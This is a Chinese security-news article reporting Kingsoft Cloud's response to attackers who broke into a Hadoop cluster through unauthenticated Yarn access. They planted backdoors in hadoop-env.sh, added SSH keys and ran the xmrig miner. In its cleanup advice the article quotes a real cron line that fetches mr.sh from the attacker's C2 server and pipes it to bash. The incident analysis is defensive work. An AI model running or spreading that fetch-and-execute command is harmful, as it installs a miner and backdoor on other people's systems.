歡迎來到太平洋安防網!
微信號
掃描上方二維碼
加入網站訂閱號
掃描上方二維碼
加入商城公眾號
手機站
掃描上方二維碼
訪問手機站
太平洋安防資訊
資訊
當前位置:安防首頁 > 資訊 > 行業資訊

金山云安珀實驗室:處理一起黑客利用Hadoop集群挖礦事件

2019-01-04 18:31:08來源:企業來稿已被 160 人閱讀

內容摘要:近日,晚間10點左右,金山云值班人員接用戶緊急反饋:在業務開發過程中,Hadoop集群某一結點輸入`hdfs dfs –ls /`會顯示未知的公鑰信息,懷疑自身服務被惡意入侵。
   近日,晚間10點左右,金山云值班人員接用戶緊急反饋:在業務開發過程中,Hadoop集群某一結點輸入`hdfs dfs –ls /`會顯示未知的公鑰信息,懷疑自身服務被惡意入侵。

  在獲知該信息后,金山云安珀實驗室迅速進行響應,第一時間與用戶進行溝通和分析排查,最后確定是黑客通過Hadoop的REST API服務Yarn的未授權訪問造成遠程命令執行入侵,經過追蹤分析處理,最后成功解除攻擊威脅。

  以下我們將詳細過程分享出來,與業界共勉,共同提升安全防御水平。

  追蹤黑客來源:凡走過必定留下蛛絲馬跡

  在接到異常信息后,安珀實驗室研究員立刻啟動分析預警流程:先確認是否被入侵、入侵的方式及可能造成的損失。通過使用命令“hdfs”進行試探,發現存在異常信息,進一步分析,在/var/spool/cron目錄下,發現了若干計劃任務文件,證明該服務器確實被入侵。

  

  通過分析,我們成功追蹤到黑客的C&C服務器地址(http://149.**.***.164:8220),連接到黑客的C2服務器上下載mr.sh并進一步分析,發現腳本存在如下幾個特征:

  1、腳本會刪除其他的挖礦進程;

  2、刪除CPU占用率大于40的進程。

  在上述操作執行完畢后,會下載真正的挖礦程序top,以及配置文件wc.conf,配置文件中包含挖礦的密碼等信息。接著,會自動添加計劃任務,將黑客的公鑰添加到~/.ssh/authorized_keys文件中,實現黑客免密碼登陸的目的。

  腳本還會將受害服務器的IP、用戶名、主機名等信息發送到黑客的服務器上,結合其將公鑰寫入到了~/.ssh/authorized_keys文件中,我們初步推測黑客可能通過腳本進行批量ssh登陸,從而實現批量管理肉雞的目的。

  接下來,我們按照該入侵路線排查用戶的服務器,不過并沒有發現同樣的問題,猜測后門可能是在其他位置,經過詳細排查,最后在/etc/hadoop/3.0.0.0-1634/0/hadoop-env.sh文件中,發現有被寫入后門的痕跡。

  

  抽絲剝繭求真相:再狡猾的狐貍也會露出尾巴

  在上述文件中,我們發現有三行同樣格式的后門,可以推測,服務器被黑客利用自動化腳本攻擊了三次,同時,我們還發現了新的攻擊腳本install.sh。將其下載后進行分析,發現該腳本會判斷是否寫過計劃任務,如果寫過的話會輸入Cron exists,這恰好是之前用戶反饋的問題。

  通過后續的分析得知,當執行hdfs等hadoop所屬的命令后,會先執行/usr/bin/hdfs,而這個可執行程序是個鏈接,鏈接到/usr/hdp/current/hadoop-hdfs-client/bin/hdfs文件。我們通過查看該文件,最終發現會執行紅框內的代碼,我們繼續追蹤如下:

  

  1、查看該文件的內容,發現會執行libexec目錄下的hdfs-config.sh腳本。

  2、跟蹤過去,在文件尾部會調用hadoop-function.sh文件。

  3、繼續跟蹤,發現會執行conf目錄下的hadoop-env.sh。該文件是黑客留有后門的文件,也就是說,用戶在執行該命令的時候,就會調用黑客留下的后門,其他有關hadoop的命令也是如此。

  根據和使用該服務器的用戶交流來判斷,之前該服務器啟動過yarn服務,并且使用默認配置,沒有進行任何的認證,開放在公網的8088端口,結合該Hadoop集群來看,黑客應該是通過Hadoop Yarn未授權訪問漏洞入侵的。

  并且,通過查看/etc/hosts文件,發現該集群還有其他幾個節點,分別是node1(已經廢棄使用很久),node2(本文分析的服務器,且還開放在公網上),node3(未連接公網),node4(未連接公網),其他節點都可以通過ssh + 主機名的方式直接登陸,并且也都發現已經被入侵了,但是通過計劃任務被寫入的時間點來看,其他機器并不是通過跳板入侵的,而是通過自動化腳本攻擊的。

  分析top挖礦程序,我們看到該程序是一個用于挖礦的軟件,真實名字叫做xmrig。

  將其md5值放入VirusTotal查詢,發現有13家報毒,是一款挖礦軟件。

  

  分析至此,整件事件已經梳理清楚,黑客通過yarn服務入侵到服務器,并且寫入了后門,執行install.sh, mr.sh程序,進行挖礦,期間通過漏洞寫入了三次后門,C&C服務器IP為新加坡,但是由于install.sh存在報錯機制,導致被發現。

  此次事件金山云安珀實驗室應對之道

  1.建議客戶登陸各個節點,將/etc/hadoop/3.0.0.0-1634/0/hadoop-env.sh文件結尾的后門進行刪除;

  2.登陸各個節點,到/var/spool/cron目錄下,查看每個文件,如果內容是0 * * * * http://149.28.137.164:8220/mr.sh | bash -sh > /dev/null 2>&1,刪除該文件;

  3.增加hadoop kerberos認證;

  4.將私用的服務放置在內網環境中使用,開放在公網的服務一定要加入認證環節。

  以上是金山云在近期追蹤并成功解決的一起比較典型的安全事件,在網絡上,每天都有無數的黑客程序在自動巡游,一旦發現安全薄弱的設備,很快就能通過各種手段進行入侵,這就要求我們樹立起牢固的安全防范意識,防患于未然。

參加太平洋安防網微信公眾號活動即有機會獲贈全年雜志、太平洋安防官網免費廣告位。安防廣告隨你登,免費雜志任你領!
還等什么呢?微信掃描上方二維碼關注吧!
免責聲明:凡注明來源本網的所有作品,均為本網合法擁有版權或有權使用的作品,歡迎轉載,注明出處。非本網作品均來自互聯網,轉載目的在于傳遞更多信息,并不代表本網贊同其觀點和對其真實性負責。
[責任編輯:wangmengbing]
0條 [查看全部]  相關評論

閱讀推薦

阿里 騰訊覬覦的萬億級市場 國內智慧停車企業大盤點

按國際慣例,我國城市停車位缺口普遍超過50%,停車難已經成我國城市交通的通病。

專家:謹防人工智能芯片成炒作噱頭

近期,國內不少互聯網及通信行業巨頭紛紛追捧人工智能芯片。雖然很多廠商的人工智能..

加速融合 安防業務正騰“云”而起

企業上云自提出至今,熱度一直居高不下:昨天(2018年11月26日),河北省工信廳舉辦萬..

經常忘帶鑰匙,這樣的生活還要持續多久……

周天的夜,寒冷而安靜。垃圾桶再沒有可容得下泡面的包裝的空間,披上件大衣便下樓。..

熱烈祝賀【安視睿】成功掛牌新三板!

深圳安視睿信息技術股份有限公司成功掛牌新三板!這意味著安視睿將開啟新征程,向打..

技術資料

液位繼電器介紹繼電器是根據某種輸入信號來接通或斷開小電流控制電路,實現遠距離控..

?

客服專線:0755-83977321|市場招商熱線:0755-83976188、83977188

廣告
合作
:2250409004
網站
客服
:1351574492
新聞
投稿
:1197354471
技術
支持
:712700030

網站備案號:粵ICP備12031422號-1 經營許可證編號:粵B2-20090398 深圳互聯網科技創新企業

太平洋安防網版權所有 2006-2019 互聯網違法和不良信息舉報中心:0755-83977321 [email protected]

历史六合图库